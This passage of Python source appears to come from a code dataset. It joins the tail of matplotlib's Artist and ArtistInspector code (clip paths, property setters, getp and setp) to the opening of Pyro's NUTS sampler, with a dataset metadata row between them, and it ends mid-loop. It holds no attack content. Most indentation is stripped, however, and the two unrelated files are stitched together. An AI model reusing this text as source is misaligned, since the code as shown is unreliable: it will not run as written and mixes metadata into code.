self.clipbox = TransformedBbox(Bbox.unit(),
path.get_transform())
self._clippath = None
success = True
elif isinstance(path, Patch):
self._clippath = TransformedPath(
path.get_path(),
path.get_transform())
success = True
elif isinstance(path, tuple):
path, transform = path
if path is None:
self._clippath = None
success = True
elif isinstance(path, Path):
self._clippath = TransformedPath(path, transform)
success = True
elif isinstance(path, TransformedPath):
self._clippath = path
success = True
if not success:
print(type(path), type(transform))
raise TypeError("Invalid arguments to set_clip_path")
        # this may result in the callbacks being hit twice, but guarantees they
# will be hit at least once
self.pchanged()
self.stale = True
def get_alpha(self):
"""
Return the alpha value used for blending - not supported on all
backends
"""
return self._alpha
def get_visible(self):
"Return the artist's visiblity"
return self._visible
def get_animated(self):
"Return the artist's animated state"
return self._animated
def get_clip_on(self):
'Return whether artist uses clipping'
return self._clipon
def get_clip_box(self):
'Return artist clipbox'
return self.clipbox
def get_clip_path(self):
'Return artist clip path'
return self._clippath
def get_transformed_clip_path_and_affine(self):
'''
Return the clip path with the non-affine part of its
transformation applied, and the remaining affine part of its
transformation.
'''
if self._clippath is not None:
return self._clippath.get_transformed_path_and_affine()
return None, None
def set_clip_on(self, b):
"""
Set whether artist uses clipping.
        When False, artists will be visible outside of the axes, which
can lead to unexpected results.
ACCEPTS: [True | False]
"""
self._clipon = b
# This may result in the callbacks being hit twice, but ensures they
# are hit at least once
self.pchanged()
self.stale = True
def _set_gc_clip(self, gc):
'Set the clip properly for the gc'
if self._clipon:
if self.clipbox is not None:
gc.set_clip_rectangle(self.clipbox)
gc.set_clip_path(self._clippath)
else:
gc.set_clip_rectangle(None)
gc.set_clip_path(None)
def get_rasterized(self):
"return True if the artist is to be rasterized"
return self._rasterized
def set_rasterized(self, rasterized):
"""
Force rasterized (bitmap) drawing in vector backend output.
Defaults to None, which implies the backend's default behavior
ACCEPTS: [True | False | None]
"""
if rasterized and not hasattr(self.draw, "_supports_rasterization"):
warnings.warn("Rasterization of '%s' will be ignored" % self)
self._rasterized = rasterized
def get_agg_filter(self):
"return filter function to be used for agg filter"
return self._agg_filter
def set_agg_filter(self, filter_func):
"""
        Set the agg_filter function.
"""
self._agg_filter = filter_func
self.stale = True
def draw(self, renderer, *args, **kwargs):
'Derived classes drawing method'
if not self.get_visible():
return
self.stale = False
def set_alpha(self, alpha):
"""
Set the alpha value used for blending - not supported on
all backends.
ACCEPTS: float (0.0 transparent through 1.0 opaque)
"""
self._alpha = alpha
self.pchanged()
self.stale = True
def set_visible(self, b):
"""
        Set the artist's visibility.
ACCEPTS: [True | False]
"""
self._visible = b
self.pchanged()
self.stale = True
def set_animated(self, b):
"""
Set the artist's animation state.
ACCEPTS: [True | False]
"""
if self._animated != b:
self._animated = b
self.pchanged()
def update(self, props):
"""
Update the properties of this :class:`Artist` from the
dictionary *prop*.
"""
store = self.eventson
self.eventson = False
changed = False
for k, v in six.iteritems(props):
if k in ['axes']:
setattr(self, k, v)
else:
func = getattr(self, 'set_' + k, None)
if func is None or not six.callable(func):
raise AttributeError('Unknown property %s' % k)
func(v)
changed = True
self.eventson = store
if changed:
self.pchanged()
self.stale = True
def get_label(self):
"""
Get the label used for this artist in the legend.
"""
return self._label
def set_label(self, s):
"""
Set the label to *s* for auto legend.
ACCEPTS: string or anything printable with '%s' conversion.
"""
if s is not None:
self._label = '%s' % (s, )
else:
self._label = None
self.pchanged()
self.stale = True
def get_zorder(self):
"""
Return the :class:`Artist`'s zorder.
"""
return self.zorder
def set_zorder(self, level):
"""
Set the zorder for the artist. Artists with lower zorder
values are drawn first.
ACCEPTS: any number
"""
self.zorder = level
self.pchanged()
self.stale = True
def update_from(self, other):
'Copy properties from *other* to *self*.'
self._transform = other._transform
self._transformSet = other._transformSet
self._visible = other._visible
self._alpha = other._alpha
self.clipbox = other.clipbox
self._clipon = other._clipon
self._clippath = other._clippath
self._label = other._label
self._sketch = other._sketch
self._path_effects = other._path_effects
self.pchanged()
self.stale = True
def properties(self):
"""
return a dictionary mapping property name -> value for all Artist props
"""
return ArtistInspector(self).properties()
def set(self, **kwargs):
"""
A property batch setter. Pass *kwargs* to set properties.
Will handle property name collisions (e.g., if both
'color' and 'facecolor' are specified, the property
with higher priority gets set last).
"""
ret = []
for k, v in sorted(kwargs.items(), reverse=True):
k = k.lower()
funcName = "set_%s" % k
func = getattr(self, funcName, None)
if func is None:
raise TypeError('There is no %s property "%s"' %
(self.__class__.__name__, k))
ret.extend([func(v)])
return ret
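    # Minimal usage sketch (assumes Line2D-style properties, purely
    # illustrative):
    #   line.set(color='r', linewidth=2, label='data')
    # which dispatches to set_color, set_linewidth and set_label in turn.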
def findobj(self, match=None, include_self=True):
"""
Find artist objects.
Recursively find all :class:`~matplotlib.artist.Artist` instances
contained in self.
*match* can be
- None: return all objects contained in artist.
- function with signature ``boolean = match(artist)``
used to filter matches
- class instance: e.g., Line2D. Only return artists of class type.
If *include_self* is True (default), include self in the list to be
checked for a match.
"""
if match is None: # always return True
def matchfunc(x):
return True
elif cbook.issubclass_safe(match, Artist):
def matchfunc(x):
return isinstance(x, match)
elif six.callable(match):
matchfunc = match
else:
raise ValueError('match must be None, a matplotlib.artist.Artist '
'subclass, or a callable')
artists = []
for c in self.get_children():
if matchfunc(c):
artists.append(c)
artists.extend([thisc for thisc in
c.findobj(matchfunc, include_self=False)
if matchfunc(thisc)])
if include_self and matchfunc(self):
artists.append(self)
return artists
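    # Illustrative queries (assumes `fig` is a Figure and the Line2D class is
    # importable; purely a sketch):
    #   fig.findobj(matplotlib.lines.Line2D)            # every line in the figure
    #   fig.findobj(lambda a: a.get_label() == 'data')  # custom match function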
def get_cursor_data(self, event):
"""
Get the cursor data for a given event.
"""
return None
def format_cursor_data(self, data):
"""
Return *cursor data* string formatted.
"""
try:
data[0]
except (TypeError, IndexError):
data = [data]
return ', '.join('{:0.3g}'.format(item) for item in data if
isinstance(item, (np.floating, np.integer, int, float)))
@property
def mouseover(self):
return self._mouseover
@mouseover.setter
def mouseover(self, val):
val = bool(val)
self._mouseover = val
ax = self.axes
if ax:
if val:
ax.mouseover_set.add(self)
else:
ax.mouseover_set.discard(self)
class ArtistInspector(object):
"""
A helper class to inspect an :class:`~matplotlib.artist.Artist`
and return information about it's settable properties and their
current values.
"""
def __init__(self, o):
"""
Initialize the artist inspector with an
:class:`~matplotlib.artist.Artist` or sequence of :class:`Artists`.
If a sequence is used, we assume it is a homogeneous sequence (all
:class:`Artists` are of the same type) and it is your responsibility
to make sure this is so.
"""
if cbook.iterable(o) and len(o):
o = o[0]
self.oorig = o
if not isinstance(o, type):
o = type(o)
self.o = o
self.aliasd = self.get_aliases()
def get_aliases(self):
"""
Get a dict mapping *fullname* -> *alias* for each *alias* in
the :class:`~matplotlib.artist.ArtistInspector`.
e.g., for lines::
{'markerfacecolor': 'mfc',
'linewidth' : 'lw',
}
"""
names = [name for name in dir(self.o) if
(name.startswith('set_') or name.startswith('get_'))
and six.callable(getattr(self.o, name))]
aliases = {}
for name in names:
func = getattr(self.o, name)
if not self.is_alias(func):
continue
docstring = func.__doc__
fullname = docstring[10:]
aliases.setdefault(fullname[4:], {})[name[4:]] = None
return aliases
_get_valid_values_regex = re.compile(
r"\n\s*ACCEPTS:\s*((?:.|\n)*?)(?:$|(?:\n\n))"
)
def get_valid_values(self, attr):
"""
Get the legal arguments for the setter associated with *attr*.
This is done by querying the docstring of the function *set_attr*
for a line that begins with ACCEPTS:
e.g., for a line linestyle, return
"[ ``'-'`` | ``'--'`` | ``'-.'`` | ``':'`` | ``'steps'`` | ``'None'``
]"
"""
name = 'set_%s' % attr
if not hasattr(self.o, name):
raise AttributeError('%s has no function %s' % (self.o, name))
func = getattr(self.o, name)
docstring = func.__doc__
if docstring is None:
return 'unknown'
if docstring.startswith('alias for '):
return None
match = self._get_valid_values_regex.search(docstring)
if match is not None:
return re.sub("\n *", " ", match.group(1))
return 'unknown'
def _get_setters_and_targets(self):
"""
Get the attribute strings and a full path to where the setter
is defined for all setters in an object.
"""
setters = []
for name in dir(self.o):
if not name.startswith('set_'):
continue
o = getattr(self.o, name)
if not six.callable(o):
continue
if six.PY2:
nargs = len(inspect.getargspec(o)[0])
else:
nargs = len(inspect.getfullargspec(o)[0])
if nargs < 2:
continue
func = o
if self.is_alias(func):
continue
source_class = self.o.__module__ + "." + self.o.__name__
for cls in self.o.mro():
if name in cls.__dict__:
source_class = cls.__module__ + "." + cls.__name__
break
setters.append((name[4:], source_class + "." + name))
return setters
def get_setters(self):
"""
Get the attribute strings with setters for object. e.g., for a line,
return ``['markerfacecolor', 'linewidth', ....]``.
"""
return [prop for prop, target in self._get_setters_and_targets()]
def is_alias(self, o):
"""
Return *True* if method object *o* is an alias for another
function.
"""
ds = o.__doc__
if ds is None:
return False
return ds.startswith('alias for ')
def aliased_name(self, s):
"""
return 'PROPNAME or alias' if *s* has an alias, else return
PROPNAME.
e.g., for the line markerfacecolor property, which has an
alias, return 'markerfacecolor or mfc' and for the transform
property, which does not, return 'transform'
"""
if s in self.aliasd:
return s + ''.join([' or %s' % x
for x
in six.iterkeys(self.aliasd[s])])
else:
return s
def aliased_name_rest(self, s, target):
"""
return 'PROPNAME or alias' if *s* has an alias, else return
PROPNAME formatted for ReST
e.g., for the line markerfacecolor property, which has an
alias, return 'markerfacecolor or mfc' and for the transform
property, which does not, return 'transform'
"""
if s in self.aliasd:
aliases = ''.join([' or %s' % x
for x
in six.iterkeys(self.aliasd[s])])
else:
aliases = ''
return ':meth:`%s <%s>`%s' % (s, target, aliases)
def pprint_setters(self, prop=None, leadingspace=2):
"""
        If *prop* is *None*, return a list of strings of all settable properties
and their valid values.
If *prop* is not *None*, it is a valid property name and that
property will be returned as a string of property : valid
values.
"""
if leadingspace:
pad = ' ' * leadingspace
else:
pad = ''
if prop is not None:
accepts = self.get_valid_values(prop)
return '%s%s: %s' % (pad, prop, accepts)
attrs = self._get_setters_and_targets()
attrs.sort()
lines = []
for prop, path in attrs:
accepts = self.get_valid_values(prop)
name = self.aliased_name(prop)
lines.append('%s%s: %s' % (pad, name, accepts))
return lines
def pprint_setters_rest(self, prop=None, leadingspace=2):
"""
        If *prop* is *None*, return a list of strings of all settable properties
and their valid values. Format the output for ReST
If *prop* is not *None*, it is a valid property name and that
property will be returned as a string of property : valid
values.
"""
if leadingspace:
pad = ' ' * leadingspace
else:
pad = ''
if prop is not None:
accepts = self.get_valid_values(prop)
return '%s%s: %s' % (pad, prop, accepts)
attrs = self._get_setters_and_targets()
attrs.sort()
lines = []
########
names = [self.aliased_name_rest(prop, target)
for prop, target
in attrs]
accepts = [self.get_valid_values(prop) for prop, target in attrs]
col0_len = max([len(n) for n in names])
col1_len = max([len(a) for a in accepts])
table_formatstr = pad + '=' * col0_len + ' ' + '=' * col1_len
lines.append('')
lines.append(table_formatstr)
lines.append(pad + 'Property'.ljust(col0_len + 3) +
'Description'.ljust(col1_len))
lines.append(table_formatstr)
lines.extend([pad + n.ljust(col0_len + 3) + a.ljust(col1_len)
for n, a in zip(names, accepts)])
lines.append(table_formatstr)
lines.append('')
return lines
########
for prop, path in attrs:
accepts = self.get_valid_values(prop)
name = self.aliased_name_rest(prop, path)
lines.append('%s%s: %s' % (pad, name, accepts))
return lines
def properties(self):
"""
return a dictionary mapping property name -> value
"""
o = self.oorig
getters = [name for name in dir(o)
if name.startswith('get_')
and six.callable(getattr(o, name))]
getters.sort()
d = dict()
for name in getters:
func = getattr(o, name)
if self.is_alias(func):
continue
try:
with warnings.catch_warnings():
warnings.simplefilter('ignore')
val = func()
except:
continue
else:
d[name[4:]] = val
return d
def pprint_getters(self):
"""
Return the getters and actual values as list of strings.
"""
d = self.properties()
names = list(six.iterkeys(d))
names.sort()
lines = []
for name in names:
val = d[name]
if getattr(val, 'shape', ()) != () and len(val) > 6:
s = str(val[:6]) + '...'
else:
s = str(val)
s = s.replace('\n', ' ')
if len(s) > 50:
s = s[:50] + '...'
name = self.aliased_name(name)
lines.append(' %s = %s' % (name, s))
return lines
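    # Illustrative output (added; not part of the original module): for a Line2D
    # the returned strings look roughly like
    #     alpha = None
    #     animated = False
    #     antialiased or aa = True
    # i.e. one 'name = value' line per gettable property, with aliases included.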
def findobj(self, match=None):
"""
Recursively find all :class:`matplotlib.artist.Artist`
instances contained in *self*.
If *match* is not None, it can be
- function with signature ``boolean = match(artist)``
- class instance: e.g., :class:`~matplotlib.lines.Line2D`
used to filter matches.
"""
if match is None: # always return True
def matchfunc(x):
return True
        elif isinstance(match, type) and issubclass(match, Artist):
def matchfunc(x):
return isinstance(x, match)
elif six.callable(match):
            matchfunc = match
else:
            raise ValueError('match must be None, a '
'matplotlib.artist.Artist '
'subclass, or a callable')
artists = []
for c in self.get_children():
if matchfunc(c):
artists.append(c)
artists.extend([thisc
for thisc
in c.findobj(matchfunc)
if matchfunc(thisc)])
if matchfunc(self):
artists.append(self)
return artists
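    # Illustrative usage (added; the names below are assumptions, not from this file):
    #   import matplotlib.lines as mlines
    #   fig.findobj(mlines.Line2D)                       # every Line2D under fig
    #   fig.findobj(lambda a: a.get_alpha() is not None)  # filter with a callable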
def getp(obj, property=None):
"""
Return the value of object's property. *property* is an optional string
for the property you want to return
Example usage::
getp(obj) # get all the object properties
getp(obj, 'linestyle') # get the linestyle property
*obj* is a :class:`Artist` instance, e.g.,
    :class:`~matplotlib.lines.Line2D` or an instance of a
:class:`~matplotlib.axes.Axes` or :class:`matplotlib.text.Text`.
If the *property* is 'somename', this function returns
obj.get_somename()
:func:`getp` can be used to query all the gettable properties with
``getp(obj)``. Many properties have aliases for shorter typing, e.g.
'lw' is an alias for 'linewidth'. In the output, aliases and full
property names will be listed as:
property or alias = value
e.g.:
linewidth or lw = 2
"""
if property is None:
insp = ArtistInspector(obj)
ret = insp.pprint_getters()
print('\n'.join(ret))
return
func = getattr(obj, 'get_' + property)
return func()
# alias
get = getp
def setp(obj, *args, **kwargs):
"""
Set a property on an artist object.
matplotlib supports the use of :func:`setp` ("set property") and
:func:`getp` to set and get object properties, as well as to do
introspection on the object. For example, to set the linestyle of a
line to be dashed, you can do::
>>> line, = plot([1,2,3])
>>> setp(line, linestyle='--')
If you want to know the valid types of arguments, you can provide the
name of the property you want to set without a value::
>>> setp(line, 'linestyle')
linestyle: [ '-' | '--' | '-.' | ':' | 'steps' | 'None' ]
If you want to see all the properties that can be set, and their
possible values, you can do::
>>> setp(line)
... long output listing omitted
:func:`setp` operates on a single instance or a list of instances.
If you are in query mode introspecting the possible values, only
the first instance in the sequence is used. When actually setting
values, all the instances will be set. e.g., suppose you have a
list of two lines, the following will make both lines thicker and
red::
>>> x = arange(0,1.0,0.01)
>>> y1 = sin(2*pi*x)
>>> y2 = sin(4*pi*x)
>>> lines = plot(x, y1, x, y2)
>>> setp(lines, linewidth=2, color='r')
:func:`setp` works with the MATLAB style string/value pairs or
with python kwargs. For example, the following are equivalent::
>>> setp(lines, 'linewidth', 2, 'color', 'r') # MATLAB style
>>> setp(lines, linewidth=2, color='r') # python style
"""
insp = ArtistInspector(obj)
if len(kwargs) == 0 and len(args) == 0:
print('\n'.join(insp.pprint_setters()))
return
if len(kwargs) == 0 and len(args) == 1:
print(insp.pprint_setters(prop=args[0]))
return
if not cbook.iterable(obj):
objs = [obj]
else:
objs = cbook.flatten(obj)
if len(args) % 2:
raise ValueError('The set args must be string, value pairs')
funcvals = []
for i in range(0, len(args) - 1, 2):
funcvals.append((args[i], args[i + 1]))
funcvals.extend(sorted(kwargs.items(), reverse=True))
ret = []
for o in objs:
for s, val in funcvals:
s = s.lower()
funcName = "set_%s" % s
func = getattr(o, funcName, None)
if func is None:
raise TypeError('There is no %s property "%s"' %
(o.__class__.__name__, s))
ret.extend([func(val)])
return [x for x in cbook.flatten(ret)]
def kwdoc(a):
hardcopy = matplotlib.rcParams['docstring.hardcopy']
if hardcopy:
return '\n'.join(ArtistInspector(a).pprint_setters_rest(
leadingspace=2))
else:
return '\n'.join(ArtistInspector(a).pprint_setters(leadingspace=2))
docstring.interpd.update(Artist=kwdoc(Artist))
_get_axes_msg = """{0} has been deprecated in mpl 1.5, please use the
axes property. A removal date has not been set."""
| mit | 6,246,624,058,802,314,000 | 30.490921 | 79 | 0.556666 | false |
uber/pyro | pyro/infer/mcmc/nuts.py | 1 | 21097 | # Copyright (c) 2017-2019 Uber Technologies, Inc.
# SPDX-License-Identifier: Apache-2.0
from collections import namedtuple
import pyro
import pyro.distributions as dist
from pyro.distributions.util import scalar_like
from pyro.infer.autoguide import init_to_uniform
from pyro.infer.mcmc.hmc import HMC
from pyro.ops.integrator import potential_grad, velocity_verlet
from pyro.util import optional, torch_isnan
def _logaddexp(x, y):
minval, maxval = (x, y) if x < y else (y, x)
return (minval - maxval).exp().log1p() + maxval
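# Added note (not in the original source): _logaddexp computes
# log(exp(x) + exp(y)) in a numerically stable way by factoring out the larger
# value. For example, with x = -1000 and y = -1001 a direct exp() would
# underflow to zero, whereas this returns roughly -1000 + log1p(exp(-1)) ~ -999.69.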
# sum_accept_probs and num_proposals are used to calculate
# the statistic accept_prob for Dual Averaging scheme;
# z_left_grads and z_right_grads are kept to avoid recalculating
# grads at left and right leaves;
# r_sum is used to check turning condition;
# z_proposal_pe and z_proposal_grads are used to cache the
# potential energy and potential energy gradient values for
# the proposal trace.
# weight is the number of valid points in case we use slice sampling
# and is the log sum of (unnormalized) probabilities of valid points
# when we use multinomial sampling
_TreeInfo = namedtuple("TreeInfo", ["z_left", "r_left", "r_left_unscaled", "z_left_grads",
"z_right", "r_right", "r_right_unscaled", "z_right_grads",
"z_proposal", "z_proposal_pe", "z_proposal_grads",
"r_sum", "weight", "turning", "diverging",
"sum_accept_probs", "num_proposals"])
class NUTS(HMC):
"""
No-U-Turn Sampler kernel, which provides an efficient and convenient way
to run Hamiltonian Monte Carlo. The number of steps taken by the
integrator is dynamically adjusted on each call to ``sample`` to ensure
an optimal length for the Hamiltonian trajectory [1]. As such, the samples
generated will typically have lower autocorrelation than those generated
by the :class:`~pyro.infer.mcmc.HMC` kernel. Optionally, the NUTS kernel
also provides the ability to adapt step size during the warmup phase.
Refer to the `baseball example <https://github.com/pyro-ppl/pyro/blob/dev/examples/baseball.py>`_
to see how to do Bayesian inference in Pyro using NUTS.
**References**
[1] `The No-U-turn sampler: adaptively setting path lengths in Hamiltonian Monte Carlo`,
Matthew D. Hoffman, and Andrew Gelman.
[2] `A Conceptual Introduction to Hamiltonian Monte Carlo`,
Michael Betancourt
[3] `Slice Sampling`,
Radford M. Neal
:param model: Python callable containing Pyro primitives.
    :param potential_fn: Python callable calculating potential energy whose input
        is a dict of real support parameters.
:param float step_size: Determines the size of a single step taken by the
verlet integrator while computing the trajectory using Hamiltonian
dynamics. If not specified, it will be set to 1.
:param bool adapt_step_size: A flag to decide if we want to adapt step_size
during warm-up phase using Dual Averaging scheme.
:param bool adapt_mass_matrix: A flag to decide if we want to adapt mass
matrix during warm-up phase using Welford scheme.
:param bool full_mass: A flag to decide if mass matrix is dense or diagonal.
:param bool use_multinomial_sampling: A flag to decide if we want to sample
candidates along its trajectory using "multinomial sampling" or using
"slice sampling". Slice sampling is used in the original NUTS paper [1],
while multinomial sampling is suggested in [2]. By default, this flag is
set to True. If it is set to `False`, NUTS uses slice sampling.
:param dict transforms: Optional dictionary that specifies a transform
for a sample site with constrained support to unconstrained space. The
transform should be invertible, and implement `log_abs_det_jacobian`.
If not specified and the model has sites with constrained support,
automatic transformations will be applied, as specified in
:mod:`torch.distributions.constraint_registry`.
:param int max_plate_nesting: Optional bound on max number of nested
:func:`pyro.plate` contexts. This is required if model contains
discrete sample sites that can be enumerated over in parallel.
:param bool jit_compile: Optional parameter denoting whether to use
the PyTorch JIT to trace the log density computation, and use this
optimized executable trace in the integrator.
:param dict jit_options: A dictionary contains optional arguments for
:func:`torch.jit.trace` function.
:param bool ignore_jit_warnings: Flag to ignore warnings from the JIT
tracer when ``jit_compile=True``. Default is False.
:param float target_accept_prob: Target acceptance probability of step size
adaptation scheme. Increasing this value will lead to a smaller step size,
so the sampling will be slower but more robust. Default to 0.8.
:param int max_tree_depth: Max depth of the binary tree created during the doubling
scheme of NUTS sampler. Default to 10.
:param callable init_strategy: A per-site initialization function.
See :ref:`autoguide-initialization` section for available functions.
Example:
>>> true_coefs = torch.tensor([1., 2., 3.])
>>> data = torch.randn(2000, 3)
>>> dim = 3
>>> labels = dist.Bernoulli(logits=(true_coefs * data).sum(-1)).sample()
>>>
>>> def model(data):
... coefs_mean = torch.zeros(dim)
... coefs = pyro.sample('beta', dist.Normal(coefs_mean, torch.ones(3)))
... y = pyro.sample('y', dist.Bernoulli(logits=(coefs * data).sum(-1)), obs=labels)
... return y
>>>
>>> nuts_kernel = NUTS(model, adapt_step_size=True)
>>> mcmc = MCMC(nuts_kernel, num_samples=500, warmup_steps=300)
>>> mcmc.run(data)
>>> mcmc.get_samples()['beta'].mean(0) # doctest: +SKIP
tensor([ 0.9221, 1.9464, 2.9228])
"""
def __init__(self,
model=None,
potential_fn=None,
step_size=1,
adapt_step_size=True,
adapt_mass_matrix=True,
full_mass=False,
use_multinomial_sampling=True,
transforms=None,
max_plate_nesting=None,
jit_compile=False,
jit_options=None,
ignore_jit_warnings=False,
target_accept_prob=0.8,
max_tree_depth=10,
init_strategy=init_to_uniform):
super().__init__(model,
potential_fn,
step_size,
adapt_step_size=adapt_step_size,
adapt_mass_matrix=adapt_mass_matrix,
full_mass=full_mass,
transforms=transforms,
max_plate_nesting=max_plate_nesting,
jit_compile=jit_compile,
jit_options=jit_options,
ignore_jit_warnings=ignore_jit_warnings,
target_accept_prob=target_accept_prob,
init_strategy=init_strategy)
self.use_multinomial_sampling = use_multinomial_sampling
self._max_tree_depth = max_tree_depth
# There are three conditions to stop doubling process:
# + Tree is becoming too big.
# + The trajectory is making a U-turn.
# + The probability of the states becoming negligible: p(z, r) << u,
# here u is the "slice" variable introduced at the `self.sample(...)` method.
# Denote E_p = -log p(z, r), E_u = -log u, the third condition is equivalent to
# sliced_energy := E_p - E_u > some constant =: max_sliced_energy.
        # This also suggests the notion "diverging" in the implementation:
# when the energy E_p diverges from E_u too much, we stop doubling.
# Here, as suggested in [1], we set dE_max = 1000.
self._max_sliced_energy = 1000
def _is_turning(self, r_left_unscaled, r_right_unscaled, r_sum):
# We follow the strategy in Section A.4.2 of [2] for this implementation.
left_angle = 0.
right_angle = 0.
for site_names, value in r_sum.items():
rho = value - (r_left_unscaled[site_names] + r_right_unscaled[site_names]) / 2
left_angle += r_left_unscaled[site_names].dot(rho)
right_angle += r_right_unscaled[site_names].dot(rho)
return (left_angle <= 0) or (right_angle <= 0)
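    # Added note (not in the original source): with rho the subtree momentum sum
    # minus half of each endpoint's momentum, the trajectory is treated as making
    # a U-turn when either endpoint has a non-positive projection onto rho,
    # i.e. r_left . rho <= 0 or r_right . rho <= 0 (the generalized no-U-turn
    # criterion described in Appendix A.4.2 of [2]).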
def _build_basetree(self, z, r, z_grads, log_slice, direction, energy_current):
step_size = self.step_size if direction == 1 else -self.step_size
z_new, r_new, z_grads, potential_energy = velocity_verlet(
z, r, self.potential_fn, self.mass_matrix_adapter.kinetic_grad, step_size, z_grads=z_grads)
r_new_unscaled = self.mass_matrix_adapter.unscale(r_new)
energy_new = potential_energy + self._kinetic_energy(r_new_unscaled)
# handle the NaN case
energy_new = scalar_like(energy_new, float("inf")) if torch_isnan(energy_new) else energy_new
sliced_energy = energy_new + log_slice
diverging = (sliced_energy > self._max_sliced_energy)
delta_energy = energy_new - energy_current
accept_prob = (-delta_energy).exp().clamp(max=1.0)
if self.use_multinomial_sampling:
tree_weight = -sliced_energy
else:
# As a part of the slice sampling process (see below), along the trajectory
            # we eliminate states for which p(z, r) < u, or dE > 0.
# Due to this elimination (and stop doubling conditions),
# the weight of binary tree might not equal to 2^tree_depth.
tree_weight = scalar_like(sliced_energy, 1. if sliced_energy <= 0 else 0.)
r_sum = r_new_unscaled
return _TreeInfo(z_new, r_new, r_new_unscaled, z_grads, z_new, r_new, r_new_unscaled, z_grads,
z_new, potential_energy, z_grads, r_sum, tree_weight, False, diverging, accept_prob, 1)
def _build_tree(self, z, r, z_grads, log_slice, direction, tree_depth, energy_current):
if tree_depth == 0:
return self._build_basetree(z, r, z_grads, log_slice, direction, energy_current)
# build the first half of tree
half_tree = self._build_tree(z, r, z_grads, log_slice,
direction, tree_depth-1, energy_current)
z_proposal = half_tree.z_proposal
z_proposal_pe = half_tree.z_proposal_pe
z_proposal_grads = half_tree.z_proposal_grads
# Check conditions to stop doubling. If we meet that condition,
# there is no need to build the other tree.
if half_tree.turning or half_tree.diverging:
return half_tree
# Else, build remaining half of tree.
# If we are going to the right, start from the right leaf of the first half.
if direction == 1:
z = half_tree.z_right
r = half_tree.r_right
z_grads = half_tree.z_right_grads
else: # otherwise, start from the left leaf of the first half
z = half_tree.z_left
r = half_tree.r_left
z_grads = half_tree.z_left_grads
other_half_tree = self._build_tree(z, r, z_grads, log_slice,
direction, tree_depth-1, energy_current)
if self.use_multinomial_sampling:
tree_weight = _logaddexp(half_tree.weight, other_half_tree.weight)
else:
tree_weight = half_tree.weight + other_half_tree.weight
sum_accept_probs = half_tree.sum_accept_probs + other_half_tree.sum_accept_probs
num_proposals = half_tree.num_proposals + other_half_tree.num_proposals
r_sum = {site_names: half_tree.r_sum[site_names] + other_half_tree.r_sum[site_names]
for site_names in self.inverse_mass_matrix}
        # The probability that the proposal belongs to each half of the tree
        # is computed based on the weights of each half.
if self.use_multinomial_sampling:
other_half_tree_prob = (other_half_tree.weight - tree_weight).exp()
else:
# For the special case that the weights of each half are both 0,
# we choose the proposal from the first half
# (any is fine, because the probability of picking it at the end is 0!).
other_half_tree_prob = (other_half_tree.weight / tree_weight if tree_weight > 0
else scalar_like(tree_weight, 0.))
is_other_half_tree = pyro.sample("is_other_half_tree",
dist.Bernoulli(probs=other_half_tree_prob))
if is_other_half_tree == 1:
z_proposal = other_half_tree.z_proposal
z_proposal_pe = other_half_tree.z_proposal_pe
z_proposal_grads = other_half_tree.z_proposal_grads
# leaves of the full tree are determined by the direction
if direction == 1:
z_left = half_tree.z_left
r_left = half_tree.r_left
r_left_unscaled = half_tree.r_left_unscaled
z_left_grads = half_tree.z_left_grads
z_right = other_half_tree.z_right
r_right = other_half_tree.r_right
r_right_unscaled = other_half_tree.r_right_unscaled
z_right_grads = other_half_tree.z_right_grads
else:
z_left = other_half_tree.z_left
r_left = other_half_tree.r_left
r_left_unscaled = other_half_tree.r_left_unscaled
z_left_grads = other_half_tree.z_left_grads
z_right = half_tree.z_right
r_right = half_tree.r_right
r_right_unscaled = half_tree.r_right_unscaled
z_right_grads = half_tree.z_right_grads
# We already check if first half tree is turning. Now, we check
# if the other half tree or full tree are turning.
turning = other_half_tree.turning or self._is_turning(r_left_unscaled, r_right_unscaled, r_sum)
# The divergence is checked by the second half tree (the first half is already checked).
diverging = other_half_tree.diverging
return _TreeInfo(z_left, r_left, r_left_unscaled, z_left_grads, z_right, r_right, r_right_unscaled,
z_right_grads, z_proposal, z_proposal_pe, z_proposal_grads, r_sum, tree_weight,
turning, diverging, sum_accept_probs, num_proposals)
def sample(self, params):
z, potential_energy, z_grads = self._fetch_from_cache()
# recompute PE when cache is cleared
if z is None:
z = params
z_grads, potential_energy = potential_grad(self.potential_fn, z)
self._cache(z, potential_energy, z_grads)
# return early if no sample sites
elif len(z) == 0:
self._t += 1
self._mean_accept_prob = 1.
if self._t > self._warmup_steps:
self._accept_cnt += 1
return z
r, r_unscaled = self._sample_r(name="r_t={}".format(self._t))
energy_current = self._kinetic_energy(r_unscaled) + potential_energy
# Ideally, following a symplectic integrator trajectory, the energy is constant.
# In that case, we can sample the proposal uniformly, and there is no need to use "slice".
        # However, that is not the case in practice: there are numerical errors during the computation.
# To deal with that problem, as in [1], we introduce an auxiliary "slice" variable (denoted
# by u).
# The sampling process goes as follows:
# first sampling u from initial state (z_0, r_0) according to
# u ~ Uniform(0, p(z_0, r_0)),
# then sampling state (z, r) from the integrator trajectory according to
# (z, r) ~ Uniform({(z', r') in trajectory | p(z', r') >= u}).
#
# For more information about slice sampling method, see [3].
# For another version of NUTS which uses multinomial sampling instead of slice sampling,
# see [2].
if self.use_multinomial_sampling:
log_slice = -energy_current
else:
# Rather than sampling the slice variable from `Uniform(0, exp(-energy))`, we can
# sample log_slice directly using `energy`, so as to avoid potential underflow or
# overflow issues ([2]).
slice_exp_term = pyro.sample("slicevar_exp_t={}".format(self._t),
dist.Exponential(scalar_like(energy_current, 1.)))
log_slice = -energy_current - slice_exp_term
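            # Added note (not in the original source): this matches sampling
            # u ~ Uniform(0, exp(-energy)) because if e ~ Exponential(1) then
            # -energy - e is distributed as the log of such a uniform draw, so the
            # slice condition p(z, r) >= u can be checked entirely in log space.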
z_left = z_right = z
r_left = r_right = r
r_left_unscaled = r_right_unscaled = r_unscaled
z_left_grads = z_right_grads = z_grads
accepted = False
r_sum = r_unscaled
sum_accept_probs = 0.
num_proposals = 0
tree_weight = scalar_like(energy_current, 0. if self.use_multinomial_sampling else 1.)
# Temporarily disable distributions args checking as
# NaNs are expected during step size adaptation.
with optional(pyro.validation_enabled(False), self._t < self._warmup_steps):
# doubling process, stop when turning or diverging
tree_depth = 0
while tree_depth < self._max_tree_depth:
direction = pyro.sample("direction_t={}_treedepth={}".format(self._t, tree_depth),
dist.Bernoulli(probs=scalar_like(tree_weight, 0.5)))
direction = int(direction.item())
if direction == 1: # go to the right, start from the right leaf of current tree
new_tree = self._build_tree(z_right, r_right, z_right_grads, log_slice,
direction, tree_depth, energy_current)
# update leaf for the next doubling process
z_right = new_tree.z_right
r_right = new_tree.r_right
r_right_unscaled = new_tree.r_right_unscaled
z_right_grads = new_tree.z_right_grads
